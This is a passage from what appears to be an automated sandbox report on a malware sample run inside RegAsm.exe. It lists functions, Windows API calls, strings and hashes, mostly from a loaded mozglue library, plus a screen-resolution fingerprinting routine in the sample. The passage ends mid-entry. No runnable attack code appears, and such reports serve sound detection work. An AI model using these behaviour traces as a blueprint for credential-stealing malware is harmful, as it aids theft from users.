moz_xmalloc.MOZGLUE(?,?,6C2E483A,?), ref: 6C2A4B2C

Strings

:H.l, xrefs: 6C2A48EB, 6C2A49FB

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID: :H.l
API String ID: 4251373892-2404925438
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: b0eeb64a62589d670d4a7dd3d721517581c0d3cddbed28093895e65899d7542b
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 887148B190060A9FC754CFA8C480AAAB7F5BF19308B104A3ED95ADBB51EB31E555CB90

Function 6C2CC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2CC784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C2CC801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C2CC83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C2CC891

Strings

inf, xrefs: 6C2CC78F
nan, xrefs: 6C2CC7A8
NAN, xrefs: 6C2CC7AD
INF, xrefs: 6C2CC794

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 5d733f506226fcf85911c390066c140689d8716932a15572105e8026f45198d1
Instruction ID: 42930fc325e0afac64e67863259fb9bfaf1531bc80b1ff496506f0f4ad9aaca5
Opcode Fuzzy Hash: 5d733f506226fcf85911c390066c140689d8716932a15572105e8026f45198d1
Instruction Fuzzy Hash: 6D518E306087498BDB41AF6CC58169AFBF0BF8A709F008A2CFDD4A7650E774D9858B43

Function 6C2A3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2A3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2A34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2A34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C2A350E
__Init_thread_footer.LIBCMT ref: 6C2A3522
__aulldiv.LIBCMT ref: 6C2A3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2A357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2A3592

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C2A3508
kernel32.dll, xrefs: 6C2A34EA

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: b1f68744f0be8ee9a80db811c39884c662e8f32a66d276c0e2b293ee9afcd4d8
Instruction ID: d9e26841189421c57e69574406c8a47a3293886794cc997880a4316bd52f33f1
Opcode Fuzzy Hash: b1f68744f0be8ee9a80db811c39884c662e8f32a66d276c0e2b293ee9afcd4d8
Instruction Fuzzy Hash: DA31B171B0021A9BDF00DFB9D948EAAB7BDFB49305F10441DE902A7660DB38E905CF60

Function 6C2A4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C2E4843,?), ref: 6C2A45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A468A
free.MOZGLUE(?,?,?,?,?,?,6C2E4843,?), ref: 6C2A46C9
free.MOZGLUE(?), ref: 6C2A46EF
free.MOZGLUE(?), ref: 6C2A4712
free.MOZGLUE(?), ref: 6C2A4735
free.MOZGLUE(?), ref: 6C2A4758
free.MOZGLUE(?), ref: 6C2A477B
free.MOZGLUE(?), ref: 6C2A479E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: c2c2a63544b559603e855ce0586c9d76af8b1f28f755d8e0a9b834094daaaf4f
Instruction ID: 000e054e65917110ede2dd6ef2169f40e5995093cea869de14d5bf730af33600
Opcode Fuzzy Hash: c2c2a63544b559603e855ce0586c9d76af8b1f28f755d8e0a9b834094daaaf4f
Instruction Fuzzy Hash: 74B1F371A001598FDB188EBCDC9076D77A6AF42328F185639EC16DFB96DB31D8428B81

Function 6C30AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C30AC52
CreateFileMappingW.KERNEL32 ref: 6C30AC7D
GetSystemInfo.KERNEL32 ref: 6C30AC98
MapViewOfFile.KERNEL32 ref: 6C30ACB0
GetSystemInfo.KERNEL32 ref: 6C30ACCD
MapViewOfFile.KERNEL32 ref: 6C30AD05
UnmapViewOfFile.KERNEL32 ref: 6C30AD1C
CloseHandle.KERNEL32 ref: 6C30AD28
UnmapViewOfFile.KERNEL32 ref: 6C30AD37
CloseHandle.KERNEL32 ref: 6C30AD43
CloseHandle.KERNEL32 ref: 6C30AD67

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: eba0cac27e85a1a01d896f3c421f182f026f6632cda330eedc51c04d2914af4d
Instruction ID: 79a592d620fbfda2907eb137c2709354cb27ee5774405b7939e874d6701ad492
Opcode Fuzzy Hash: eba0cac27e85a1a01d896f3c421f182f026f6632cda330eedc51c04d2914af4d
Instruction Fuzzy Hash: 7D3150B1A047048FDB00BF7CE64926EBBF4FF85309F05892DE98697211EB749448CB92

Function 6C2DF2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C2DD9DB), ref: 6C2DF2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C2DF2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C2DF386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C2DF347

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C2DF3C8
free.MOZGLUE(00000000,00000000), ref: 6C2DF3F3
free.MOZGLUE(00000000,00000000), ref: 6C2DF3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6C2DF413

Strings

ntdll.dll, xrefs: 6C2DF2F0

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: 161bcfd7a72d8fd12a6b9217a0bd6e8fe23c0db9c131bb326a2956900dcb6a59
Instruction ID: 135fcd7e371185322fd7426ed5d1d783880bcce5e2516f53dbde875457b52810
Opcode Fuzzy Hash: 161bcfd7a72d8fd12a6b9217a0bd6e8fe23c0db9c131bb326a2956900dcb6a59
Instruction Fuzzy Hash: 4F4121B1E0021D8BDF049F28D841B9AB7B4EF55359F22412DEC2AA7B80EB34F444CB85

Function 6C306A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C32F618), ref: 6C306A68
GetCurrentProcess.KERNEL32 ref: 6C306A7D
GetCurrentProcess.KERNEL32 ref: 6C306AA1
EnterCriticalSection.KERNEL32(6C32F618), ref: 6C306AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C306AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C306B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C306B65
LeaveCriticalSection.KERNEL32(6C32F618,?,?), ref: 6C306B83

Strings

SymInitialize, xrefs: 6C306BA3

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: 9debf675afbbf22705ce47725bb3ea81818a25c12dd2e234b7723e432fa767f7
Instruction ID: 8684f907a8f958f041970f6a247fd123b79715f351f82e8638345b05575755ab
Opcode Fuzzy Hash: 9debf675afbbf22705ce47725bb3ea81818a25c12dd2e234b7723e432fa767f7
Instruction Fuzzy Hash: F3418C716053449FEF00DF74D889B9A3BB8EB46704F04417DED898B282DA759548CBA1

Function 6C2B9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C2B9675
__Init_thread_footer.LIBCMT ref: 6C2B9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C2B96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C2B9707
__Init_thread_footer.LIBCMT ref: 6C2B971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C2B9773

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C2B97B7
FreeLibrary.KERNEL32 ref: 6C2B97D0
FreeLibrary.KERNEL32 ref: 6C2B97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C2B9824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C2B9670
ntdll.dll, xrefs: 6C2B96E3
NtMapViewOfSection, xrefs: 6C2B9701
MapViewOfFileNuma2, xrefs: 6C2B97B1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 50bf33f0db5555b1cbe8ec837192ca42e23965bdc89fa9aaad6b155407190083
Instruction ID: bc27d5c4c37fc8e8a8896f4318eeba3ddfbb77e36ef68ceb035fd6eff2681cce
Opcode Fuzzy Hash: 50bf33f0db5555b1cbe8ec837192ca42e23965bdc89fa9aaad6b155407190083
Instruction Fuzzy Hash: 5741B1B060021A9BDF00EFA8E884A9677B8EB5D799F01412CED45A7740D738E815CFA1

Function 6C2F0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2F0039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2F0041
GetCurrentThreadId.KERNEL32 ref: 6C2F0075
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2F0082
moz_xmalloc.MOZGLUE(00000048), ref: 6C2F0090
free.MOZGLUE(?), ref: 6C2F0104
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2F011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C2F005B

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 990113fe0e6258c2c8d9c2c352bc1e79bf465303d6c96d693056a6fdcf49c5d6
Instruction ID: 72131527f17f8adeb0b7fc4fc4c138a242cdcf108ce162d994b02ea7c2a7b689
Opcode Fuzzy Hash: 990113fe0e6258c2c8d9c2c352bc1e79bf465303d6c96d693056a6fdcf49c5d6
Instruction Fuzzy Hash: E6418BB5A006589FCB10CF68C840A9ABBF5FF49718F40492EED5A97B40DB35A815CFA1

Function 6C2B7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2B7EA7
malloc.MOZGLUE(00000001), ref: 6C2B7EB3

Part of subcall function 6C2BCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C2BCB49
Part of subcall function 6C2BCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C2BCBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C2B7EC4
mozalloc_abort.MOZGLUE(?), ref: 6C2B7F19
malloc.MOZGLUE(?), ref: 6C2B7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C2B7F4D

Strings

d, xrefs: 6C2B7F89

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 1429a23aca6e7c08f022fd8991dda73646e3599b38dbacd63a23a50927c4e47d
Instruction ID: 4308c25359910fbdfd678b5687d9f09b4df49af8f6783a78c4a134e9b53bed2d
Opcode Fuzzy Hash: 1429a23aca6e7c08f022fd8991dda73646e3599b38dbacd63a23a50927c4e47d
Instruction Fuzzy Hash: 7A31F561E0038C9BDF019B38DC055FEB778EF96608F059628EC5967612FB74A588C390

Function 6C30AAB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C32E220,?), ref: 6C30BC2D
ReleaseSRWLockExclusive.KERNEL32(6C32E220), ref: 6C30BC42
RtlFreeHeap.NTDLL(?,00000000,6C31E300), ref: 6C30BC82
RtlFreeUnicodeString.NTDLL(6C32E210), ref: 6C30BC91
RtlFreeUnicodeString.NTDLL(6C32E208), ref: 6C30BCA3
RtlFreeHeap.NTDLL(?,00000000,6C32E21C), ref: 6C30BCD2
free.MOZGLUE(?), ref: 6C30BCD8

Strings

,2l, xrefs: 6C30AABA

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID: ,2l
API String ID: 3047341122-1254850157
Opcode ID: 6e3584db57bdfb5128a64b5559c5eb441770babfe03bd9f0971c59fb28b64a28
Instruction ID: 3cc53b039cc4525ef15c2dea4a09fdf351bd3502289c2a6462af126a7acdae32
Opcode Fuzzy Hash: 6e3584db57bdfb5128a64b5559c5eb441770babfe03bd9f0971c59fb28b64a28
Instruction Fuzzy Hash: D121AC726403148FE720EF46D880BA6B7ACAF4162CF148469E95A5BA50CB76E845CFE1

Function 004187C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(0133A978,00000000,00000000,00000000), ref: 004187F5
GetDeviceCaps.GDI32(?,00000008), ref: 00418804
GetDeviceCaps.GDI32(?,0000000A), ref: 00418813
ReleaseDC.USER32(00000000,?), ref: 00418822
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
wsprintfA.USER32 ref: 00418850

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

%dx%d, xrefs: 00418847

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: 262a31a7c7e64c3cbe5d33e2bc886069313bc1d92689518f925e1d4ed3839940
Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
Opcode Fuzzy Hash: 262a31a7c7e64c3cbe5d33e2bc886069313bc1d92689518f925e1d4ed3839940
Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5

Function 6C2B3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C2B3CCC), ref: 6C2B3EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C2B3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C2B3CCC), ref: 6C2B4006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C2B40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C2B3CCC), ref: 6C2B40AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C2B3CCC), ref: 6C2B40C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C2B4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C2B3CCC), ref: 6C2B4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C2B3CCC), ref: 6C2B4157

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: bad534e469ee7fc80e5469c6f26d7fffd7bb7d673066cbb93736d5dcbf5c8c8b
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: DCA16DB1A0021ACFDB44CF68C8C0659B7B5BF48358F2545A9DD09AF752DB71E886CFA0

Function 6C2A2030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C2C3F47,?,?,?,6C2C3F47,6C2C1A70,?), ref: 6C2A207F
memset.VCRUNTIME140(?,000000E5,6C2C3F47,?,6C2C3F47,6C2C1A70,?), ref: 6C2A20DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C2C3F47,6C2C1A70,?), ref: 6C2A211A
EnterCriticalSection.KERNEL32(6C32E744,?,6C2C3F47,6C2C1A70,?), ref: 6C2A2145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C2C3F47,6C2C1A70,?), ref: 6C2A21BA
EnterCriticalSection.KERNEL32(6C32E744,?,6C2C3F47,6C2C1A70,?), ref: 6C2A21E0
LeaveCriticalSection.KERNEL32(6C32E744,?,6C2C3F47,6C2C1A70,?), ref: 6C2A2232

Strings

